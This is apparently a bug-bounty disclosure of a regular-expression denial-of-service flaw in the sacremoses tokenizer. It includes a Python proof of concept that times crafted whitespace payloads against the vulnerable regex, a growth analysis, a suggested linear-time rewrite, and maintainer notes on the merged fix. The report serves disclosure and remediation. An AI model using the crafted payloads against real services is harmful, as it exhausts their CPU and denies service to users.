Inefficient Regular Expression Complexity in alvations/sacremoses

Valid

Reported on Sep 20th 2021


✍️ Description

The sacremoses package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply crafted text as input to the has_numeric_only function may cause an application to consume an excessive amount of CPU time. The vulnerable regex is on the pinned line linked below.

🕵️‍♂️ Proof of Concept

The reproducer below copies the relevant code from:

https://github.com/alvations/sacremoses/blob/dc203fb2b41e1f8c8bbbd4606732945e6cdb090e/sacremoses/tokenize.py#L366

Save the following as poc.py and run it:

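import re
import time

def has_numeric_only(text):
    # Regex copied from sacremoses/tokenize.py (the line pinned above).
    return bool(re.search(r"(.*)[\s]+(\#NUMERIC_ONLY\#)", text))

for i in range(1, 50000):
    start_time = time.perf_counter()
    # Whitespace-only payload: the marker never matches, so the regex
    # engine has to backtrack through every split of the whitespace run.
    payload = " " * (i * 500 + 1)
    has_numeric_only(payload)
    # perf_counter() returns fractional seconds, so the elapsed time is in seconds.
    elapsed = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(elapsed) + " s")

Check the output (times are in seconds):

Payload.length: 501: 0.2941443 s
Payload.length: 1001: 2.5347709000000003 s
Payload.length: 1501: 9.3377153 s
Payload.length: 2001: 21.428344199999998 s
Payload.length: 2501: 40.7420754 s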
--
--
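
To make the growth rate visible, the timings above can be put on a log-log scale. The snippet below is a minimal sketch that uses only the five measurements printed by the PoC; the helper name growth_exponent is ours and is not part of sacremoses. Because it works with ratios, the result does not depend on the time unit.

```python
import math

# (payload length, elapsed time) pairs copied from the PoC output above.
samples = [
    (501, 0.2941443),
    (1001, 2.5347709000000003),
    (1501, 9.3377153),
    (2001, 21.428344199999998),
    (2501, 40.7420754),
]

def growth_exponent(first, last):
    """Estimate k in time ~ length ** k from two measurements (log-log slope)."""
    (n0, t0), (n1, t1) = first, last
    return math.log(t1 / t0) / math.log(n1 / n0)

exponent = growth_exponent(samples[0], samples[-1])
print(f"estimated exponent: {exponent:.2f}")
```

With these numbers the estimate comes out close to 3, meaning the running time grows roughly with the cube of the payload length. This is an estimate from a handful of points on one machine, not a formal complexity bound.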

💥 Impact

An attacker can exploit this vulnerability to exhaust CPU resources, which can make the application unresponsive or cause it to crash.
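
One way to avoid the backtracking altogether is to answer the same yes/no question without a regex. The sketch below is a hypothetical alternative, not necessarily what the maintainers merged: the name has_numeric_only_linear is ours, and it assumes that str.isspace() is an acceptable stand-in for the regex class \s and that only the boolean result is needed, not the capture groups.

```python
import re

MARKER = "#NUMERIC_ONLY#"

def has_numeric_only_regex(text):
    # Pattern copied from the proof of concept; kept only for comparison.
    return bool(re.search(r"(.*)[\s]+(\#NUMERIC_ONLY\#)", text))

def has_numeric_only_linear(text):
    """Hypothetical replacement: True if MARKER occurs directly after whitespace."""
    pos = text.find(MARKER)
    while pos != -1:
        # The regex needs at least one whitespace character before the marker.
        if pos > 0 and text[pos - 1].isspace():
            return True
        pos = text.find(MARKER, pos + 1)
    return False

# Compare both versions on a few small inputs.
for sample in ["", "#NUMERIC_ONLY#", "12 #NUMERIC_ONLY#", "12#NUMERIC_ONLY#", " " * 40]:
    assert has_numeric_only_linear(sample) == has_numeric_only_regex(sample)

# A large whitespace-only payload no longer triggers backtracking.
print(has_numeric_only_linear(" " * 1_000_000))
```

Since re.search already tries every starting position, the leading (.*) adds nothing to the boolean answer, which is why a plain substring scan can give the same result on these inputs.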

We created a GitHub Issue asking the maintainers to create a SECURITY.md (a year ago)
We have contacted a member of the alvations/sacremoses team and are waiting to hear back (a year ago)
alvations validated this vulnerability (a year ago)
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs

alvations (Maintainer), a year ago:

Hopefully the fix patches the issue. https://github.com/alvations/sacremoses/commit/8ad457e3cc25579140757befffd6f0e3b421728d

alvations (Maintainer), a year ago:

Output from the patched code:

Payload.length: 501: 0.003822868000042945
Payload.length: 1001: 0.013954541999964931
Payload.length: 1501: 0.03276839399995879
Payload.length: 2001: 0.03420310699993934
Payload.length: 2501: 0.04483655900003214
Payload.length: 3001: 0.06444194000005155
Payload.length: 3501: 0.08590082599994275
Payload.length: 4001: 0.11723401599988392
Payload.length: 4501: 0.15499364899983448
Payload.length: 5001: 0.1835449590000735
Payload.length: 5501: 0.2252455000000282
Payload.length: 6001: 0.27508970099984253
Payload.length: 6501: 0.3183373350000238
Payload.length: 7001: 0.3812148319998414
Payload.length: 7501: 0.4374870980000196
Payload.length: 8001: 0.46587393099980545
Payload.length: 8501: 0.5298086889999922
Payload.length: 9001: 0.5926716750000196
Payload.length: 9501: 0.6626590920000126
Payload.length: 10001: 0.8364324670001224
Payload.length: 10501: 0.8452605460001905
Payload.length: 11001: 1.0234147620001295
Payload.length: 11501: 1.0170199919998595
Payload.length: 12001: 1.1000493749997986
Payload.length: 12501: 1.152461945999903
Payload.length: 13001: 1.275610899999947
Payload.length: 13501: 1.5599431390000973
Payload.length: 14001: 1.5379346249999344
Payload.length: 14501: 1.6563336639999306
Payload.length: 15001: 1.7692955659999825
Payload.length: 15501: 1.9372383120000904
Payload.length: 16001: 2.1138349539999126
Payload.length: 16501: 2.208436567000035
Payload.length: 17001: 2.380479092000087
Payload.length: 17501: 2.8406364089998988
Payload.length: 18001: 2.697687755999823
Payload.length: 18501: 2.9228775910000877
Payload.length: 19001: 2.982141861000173
Payload.length: 19501: 3.283239590999983
Payload.length: 20001: 3.7901370419999694
Payload.length: 20501: 3.916349029999992
Payload.length: 21001: 4.259886679999909
Payload.length: 21501: 4.544129224000017
Payload.length: 22001: 4.109759947000157
Payload.length: 22501: 5.430233352999949
Payload.length: 23001: 4.856895300000133
Payload.length: 23501: 5.014447578999807
Payload.length: 24001: 5.287110871000095
Payload.length: 24501: 5.420541578999973
Payload.length: 25001: 5.431174684000098
Payload.length: 25501: 5.460154396999997
Payload.length: 26001: 5.928103772999975
Payload.length: 26501: 6.098925184000109
Payload.length: 27001: 7.673190148999993
Payload.length: 27501: 6.890132009999888
Payload.length: 28001: 6.930379094000045
Payload.length: 28501: 7.693255152999882
Payload.length: 29001: 8.07169953499988
Payload.length: 29501: 10.172807593000016
Payload.length: 30001: 8.116375470000094
Payload.length: 30501: 8.90535412500003
Payload.length: 31001: 8.844282576000069
Payload.length: 31501: 8.884001552999962
Payload.length: 32001: 9.157708125
Payload.length: 32501: 10.213799708999886
Payload.length: 33001: 10.733917410000004
Payload.length: 33501: 10.971407869000132
Payload.length: 34001: 10.043182203000015
Payload.length: 34501: 10.756050633000086
Payload.length: 35001: 10.993081897000138
Payload.length: 35501: 11.081026316999896
Payload.length: 36001: 11.170041388999834
Payload.length: 36501: 12.004563393000126
Payload.length: 37001: 12.02783777600007
Payload.length: 37501: 12.290785987999925
Payload.length: 38001: 12.940709454999933
Payload.length: 38501: 13.295860833000006
Payload.length: 39001: 15.26432554500002
Payload.length: 39501: 14.020210018999933
Payload.length: 40001: 14.538428580999835
Payload.length: 40501: 14.936995268000146
Payload.length: 41001: 15.897866563000207
Payload.length: 41501: 15.54425606000018
Payload.length: 42001: 15.995694290999836
Payload.length: 42501: 17.443289820000018
Payload.length: 43001: 20.75653818600017
Payload.length: 43501: 19.046379836999904
Payload.length: 44001: 20.43581257400001
Payload.length: 44501: 22.571010244999798
Payload.length: 45001: 19.44450578399983
Payload.length: 45501: 18.88811397900008
Payload.length: 46001: 18.30662667899969
Payload.length: 46501: 17.883042994000334
Payload.length: 47001: 18.59654988500006
alvations confirmed that a fix has been merged on 8ad457 (a year ago)
alvations has been awarded the fix bounty
tokenize.py#L366 has been validated